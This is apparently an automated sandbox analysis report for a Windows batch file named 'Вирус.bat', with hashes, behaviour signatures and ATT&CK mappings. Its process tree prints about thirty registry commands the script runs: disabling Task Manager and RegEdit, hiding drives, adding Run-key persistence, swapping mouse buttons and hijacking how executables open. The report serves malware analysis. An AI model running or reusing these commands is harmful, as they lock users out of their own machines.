b901e9ee6264fda3dfbe5f3527c3a5bf51a3185c7034fdc9b85c5dd6136b93c1

Resubmissions

24/10/2023, 02:22

231024-ctyhbsbg99 1

24/10/2023, 02:21

231024-cs56saaa7z 8

24/10/2023, 02:20

231024-csghesaa7w 8

24/10/2023, 02:11

231024-cmscqsbg57 8

Analysis

max time kernel
38s
max time network
42s
platform
windows7_x64
resource
win7-20231023-en
resource tags

arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
submitted
24/10/2023, 02:21

Sharing

Copy URL Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Вирус.bat
Size

8KB
MD5

418d1f775abafec5ecb582a39d6bda01
SHA1

d4cd5ee06f74752eb2955fa8d8ed1f1c58652654
SHA256

b901e9ee6264fda3dfbe5f3527c3a5bf51a3185c7034fdc9b85c5dd6136b93c1
SHA512

e3da1d99c2b8d94c569e478124f6b45c64173fa301dcccaa2528580f526667b0bdd3332a9bd8676f8b64a8c373d77475d73da69c4d350e4e0c6bc427f92f05e1
SSDEEP

96:SVrwV2EAV2EK0wQ+cdv7lvQcy2oFQ0ELzNMHNMnX839bLJSqPD06RbhoYEt8H2Zo:z2B2dcdF9PSmylelsccLIbhbK

Score

8^/10

evasion persistence

Malware Config

Signatures

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\disableregistrytools = "1"	reg.exe

Disables Task Manager via registry modification
evasion

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunExplorer32 = "C:\\Windows\\user32dll.bat"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\IExplorer = "0"	reg.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID	WScript.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1092	WScript.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1232 wrote to memory of 2728	1232	cmd.exe	29
PID 1232 wrote to memory of 2728	1232	cmd.exe	29
PID 1232 wrote to memory of 2728	1232	cmd.exe	29
PID 1232 wrote to memory of 2808	1232	cmd.exe	30
PID 1232 wrote to memory of 2808	1232	cmd.exe	30
PID 1232 wrote to memory of 2808	1232	cmd.exe	30
PID 1232 wrote to memory of 2104	1232	cmd.exe	31
PID 1232 wrote to memory of 2104	1232	cmd.exe	31
PID 1232 wrote to memory of 2104	1232	cmd.exe	31
PID 1232 wrote to memory of 1216	1232	cmd.exe	32
PID 1232 wrote to memory of 1216	1232	cmd.exe	32
PID 1232 wrote to memory of 1216	1232	cmd.exe	32
PID 1232 wrote to memory of 2384	1232	cmd.exe	33
PID 1232 wrote to memory of 2384	1232	cmd.exe	33
PID 1232 wrote to memory of 2384	1232	cmd.exe	33
PID 1232 wrote to memory of 3004	1232	cmd.exe	34
PID 1232 wrote to memory of 3004	1232	cmd.exe	34
PID 1232 wrote to memory of 3004	1232	cmd.exe	34
PID 1232 wrote to memory of 2636	1232	cmd.exe	35
PID 1232 wrote to memory of 2636	1232	cmd.exe	35
PID 1232 wrote to memory of 2636	1232	cmd.exe	35
PID 1232 wrote to memory of 2624	1232	cmd.exe	36
PID 1232 wrote to memory of 2624	1232	cmd.exe	36
PID 1232 wrote to memory of 2624	1232	cmd.exe	36
PID 1232 wrote to memory of 2500	1232	cmd.exe	37
PID 1232 wrote to memory of 2500	1232	cmd.exe	37
PID 1232 wrote to memory of 2500	1232	cmd.exe	37
PID 1232 wrote to memory of 2376	1232	cmd.exe	38
PID 1232 wrote to memory of 2376	1232	cmd.exe	38
PID 1232 wrote to memory of 2376	1232	cmd.exe	38
PID 1232 wrote to memory of 2776	1232	cmd.exe	39
PID 1232 wrote to memory of 2776	1232	cmd.exe	39
PID 1232 wrote to memory of 2776	1232	cmd.exe	39
PID 1232 wrote to memory of 2820	1232	cmd.exe	40
PID 1232 wrote to memory of 2820	1232	cmd.exe	40
PID 1232 wrote to memory of 2820	1232	cmd.exe	40
PID 1232 wrote to memory of 2656	1232	cmd.exe	41
PID 1232 wrote to memory of 2656	1232	cmd.exe	41
PID 1232 wrote to memory of 2656	1232	cmd.exe	41
PID 1232 wrote to memory of 2528	1232	cmd.exe	42
PID 1232 wrote to memory of 2528	1232	cmd.exe	42
PID 1232 wrote to memory of 2528	1232	cmd.exe	42
PID 1232 wrote to memory of 2516	1232	cmd.exe	43
PID 1232 wrote to memory of 2516	1232	cmd.exe	43
PID 1232 wrote to memory of 2516	1232	cmd.exe	43
PID 1232 wrote to memory of 2584	1232	cmd.exe	44
PID 1232 wrote to memory of 2584	1232	cmd.exe	44
PID 1232 wrote to memory of 2584	1232	cmd.exe	44
PID 1232 wrote to memory of 2944	1232	cmd.exe	45
PID 1232 wrote to memory of 2944	1232	cmd.exe	45
PID 1232 wrote to memory of 2944	1232	cmd.exe	45
PID 1232 wrote to memory of 2716	1232	cmd.exe	46
PID 1232 wrote to memory of 2716	1232	cmd.exe	46
PID 1232 wrote to memory of 2716	1232	cmd.exe	46
PID 1232 wrote to memory of 2660	1232	cmd.exe	47
PID 1232 wrote to memory of 2660	1232	cmd.exe	47
PID 1232 wrote to memory of 2660	1232	cmd.exe	47
PID 1232 wrote to memory of 2664	1232	cmd.exe	48
PID 1232 wrote to memory of 2664	1232	cmd.exe	48
PID 1232 wrote to memory of 2664	1232	cmd.exe	48
PID 1232 wrote to memory of 2536	1232	cmd.exe	49
PID 1232 wrote to memory of 2536	1232	cmd.exe	49
PID 1232 wrote to memory of 2536	1232	cmd.exe	49
PID 1232 wrote to memory of 2556	1232	cmd.exe	50

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Вирус.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1232
- C:\Windows\system32\reg.exe
  reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ┬╢┬º=C:\Users\Admin\AppData\Local\Temp\Вирус.bat
  2⤵
  PID:2728
- C:\Windows\system32\reg.exe
  reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d C:\Windows\user32dll.bat /f
  2⤵
  - Adds Run key to start application
  PID:2808
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
  2⤵
  PID:2104
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
  2⤵
  PID:1216
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
  2⤵
  PID:2384
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
  2⤵
  - Modifies Internet Explorer settings
  PID:3004
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
  2⤵
  PID:2636
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
  2⤵
  PID:2624
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
  2⤵
  PID:2500
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
  2⤵
  - Disables RegEdit via registry modification
  PID:2376
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
  2⤵
  PID:2776
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
  2⤵
  PID:2820
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:2656
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
  2⤵
  PID:2528
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:2516
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
  2⤵
  PID:2584
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:2944
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
  2⤵
  PID:2716
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
  2⤵
  PID:2660
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:2664
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:2536
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
  2⤵
  PID:2556
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
  2⤵
  PID:2492
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
  2⤵
  PID:2488
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
  2⤵
  PID:2508
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:2524
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
  2⤵
  PID:2540
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
  2⤵
  PID:2568
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:2616
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
  2⤵
  PID:2948
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
  2⤵
  PID:2900
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
  2⤵
  PID:2552
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
  2⤵
  PID:2056
- C:\Windows\system32\reg.exe
  reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
  2⤵
  PID:2920
- C:\Windows\system32\rundll32.exe
  rundll32 user32, SwapMouseButton
  2⤵
  PID:2472
- C:\Windows\system32\reg.exe
  reg add "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d rundll32.exe /f
  2⤵
  PID:2448
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\temp.vbs"
  2⤵
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  PID:1092

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:2148

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:1616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\temp.vbs

Filesize
2KB

MD5
3718febf44ad3b6c18128a455bd697d9

SHA1
448b46eb8911524cbcf8c6e3d54d1a3b368ccebc

SHA256
809680f109e4a3429944f31932bc12b297794e48d3a78c27edbb86551dee5699

SHA512
404a25603f412ed9f5d8b8f64d141650b86d2e64755657fa3405cd6477af1b5147ea27041adc6a031c5b558a904df5ee5ec0d3c3f7b6267f87aa133fc811895f

Download Submit
memory/1616-120-0x00000000026E0000-0x00000000026E1000-memory.dmp

Filesize
4KB

Download
memory/2148-119-0x0000000002A40000-0x0000000002A41000-memory.dmp

Filesize
4KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads